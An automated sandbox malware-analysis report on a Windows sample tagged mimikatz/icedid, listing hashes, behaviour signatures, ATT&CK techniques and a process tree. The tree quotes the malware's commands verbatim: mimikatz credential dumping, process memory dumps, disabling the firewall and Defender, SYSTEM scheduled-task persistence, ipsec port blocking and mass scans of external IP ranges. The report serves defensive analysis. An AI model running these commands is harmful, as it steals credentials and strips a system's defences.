Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
02-10-2024 08:41
General
-
Target
2024-10-02_68eb08c84e70f1faa1694a15bf771ee2_hacktools_icedid_mimikatz.exe
-
Size
8.1MB
-
MD5
68eb08c84e70f1faa1694a15bf771ee2
-
SHA1
27e5be35ec3fc4910e1e8b491cd51013cb8aaf58
-
SHA256
580f5a1ef3dd19ac435e15d1702447bc3e9d4ae847b64f73195c52b34add870a
-
SHA512
55016aff09420b34275bc12964ca2d8a76517a13e9160194229171389117e742278a8a4cdbd462d8074b8473c0e3d7c42541518590d940afc5b7926dca50912c
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (19611) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 35 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\ciubbeybg\auelfz.exe"C:\Windows\TEMP\ciubbeybg\auelfz.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-02_68eb08c84e70f1faa1694a15bf771ee2_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-02_68eb08c84e70f1faa1694a15bf771ee2_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tiagluue\wyzubbc.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\tiagluue\wyzubbc.exeC:\Windows\tiagluue\wyzubbc.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4116,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4448 /prefetch:81⤵
-
C:\Windows\tiagluue\wyzubbc.exeC:\Windows\tiagluue\wyzubbc.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gybaengyl\abausqena\wpcap.exe /S2⤵
-
C:\Windows\gybaengyl\abausqena\wpcap.exeC:\Windows\gybaengyl\abausqena\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gybaengyl\abausqena\byneybtbu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\gybaengyl\abausqena\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\gybaengyl\abausqena\byneybtbu.exeC:\Windows\gybaengyl\abausqena\byneybtbu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\gybaengyl\abausqena\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gybaengyl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gybaengyl\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\gybaengyl\Corporate\vfshost.exeC:\Windows\gybaengyl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hcacbbgbt" /ru system /tr "cmd /c C:\Windows\ime\wyzubbc.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "hcacbbgbt" /ru system /tr "cmd /c C:\Windows\ime\wyzubbc.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yclstguhe" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tiagluue\wyzubbc.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yclstguhe" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tiagluue\wyzubbc.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dyiyeenct" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ciubbeybg\auelfz.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "dyiyeenct" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ciubbeybg\auelfz.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 812 C:\Windows\TEMP\gybaengyl\812.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 384 C:\Windows\TEMP\gybaengyl\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2144 C:\Windows\TEMP\gybaengyl\2144.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2744 C:\Windows\TEMP\gybaengyl\2744.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2764 C:\Windows\TEMP\gybaengyl\2764.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2996 C:\Windows\TEMP\gybaengyl\2996.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2188 C:\Windows\TEMP\gybaengyl\2188.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 3864 C:\Windows\TEMP\gybaengyl\3864.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 3956 C:\Windows\TEMP\gybaengyl\3956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 4056 C:\Windows\TEMP\gybaengyl\4056.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 664 C:\Windows\TEMP\gybaengyl\664.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 3172 C:\Windows\TEMP\gybaengyl\3172.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 4300 C:\Windows\TEMP\gybaengyl\4300.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 3732 C:\Windows\TEMP\gybaengyl\3732.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2160 C:\Windows\TEMP\gybaengyl\2160.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 2700 C:\Windows\TEMP\gybaengyl\2700.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 4476 C:\Windows\TEMP\gybaengyl\4476.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gybaengyl\sibyhtagb.exeC:\Windows\TEMP\gybaengyl\sibyhtagb.exe -accepteula -mp 1532 C:\Windows\TEMP\gybaengyl\1532.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\gybaengyl\abausqena\scan.bat2⤵
-
C:\Windows\gybaengyl\abausqena\slunhablh.exeslunhablh.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\iaecas.exeC:\Windows\SysWOW64\iaecas.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ciubbeybg\auelfz.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ciubbeybg\auelfz.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tiagluue\wyzubbc.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\tiagluue\wyzubbc.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\wyzubbc.exe1⤵
-
C:\Windows\ime\wyzubbc.exeC:\Windows\ime\wyzubbc.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ciubbeybg\auelfz.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ciubbeybg\auelfz.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tiagluue\wyzubbc.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\tiagluue\wyzubbc.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\wyzubbc.exe1⤵
-
C:\Windows\ime\wyzubbc.exeC:\Windows\ime\wyzubbc.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.2MB
MD5228e2ca0f2243cb5c1ad3a449266a4fc
SHA122d730d539419515c92b027fbac3a315c9a46cec
SHA256d30f40cce4e941f2e5565d7238f702cabbaa72b539160a2e508fdcf89771d08f
SHA51260270c43c867ef886319f7d6d723c0389e458af7d3d31941e8706d3cf47db951f4be7d37a1a4ceaaea61d34ffd1e4a263c9e194e7a01e666d8b4c3d9f9479251
-
Filesize
2.9MB
MD5d622dd2c95dfe4f5b88dd7d0e6fd6abb
SHA16b3518d051aa20c4c1f02b5d2090b8f1e81f27ef
SHA256c986c838d38a785aaf3d7c9629e66859a40ed800f4299d07eeab534e22fa76f2
SHA5127bfd1128a8f74221627fe969a81a21af0721e72a59ae7c4c788f1262965eaeaecccfa7f882720e408d7c17c0e183d1fcb6bf6e5c5cd636a4c845f82afc509f03
-
Filesize
7.8MB
MD5055cc49751d4a6c0aa3032d3c886704f
SHA102a686025153f0be5fe46a6fd188043600d59077
SHA256e53c9ba9b2802954d232f45c90daf1280e4afb52e8207ae40660835cc6bef04f
SHA512b6f6f5b4b2bf90dc3843e5100db22921a520e42646b2c242f6c42b6f23e73f8bd6dd6047e3ff15590f49d0068b2db357a78edf2157f0e4fa61d037b1070422ac
-
Filesize
3.8MB
MD5a45458906784bcb0e93ca4254780644a
SHA1a7caaf13cf46806e453b53e140fe88151c01f1cf
SHA256db6fe52a63c21f7174e6b84da6d03be3a551ac322c0e928004457ec46af14141
SHA5123c77904fe5d663e6f5bef8468400b86a8e9e19f3c28e817ee390ae882ef1bdab4f261be5b950f351fc40ebf27b4f14fd8c354678589ecad1879fdd8cf6b22e0d
-
Filesize
809KB
MD52e8abbdb1eac4378fd0a3a28f29c1b6d
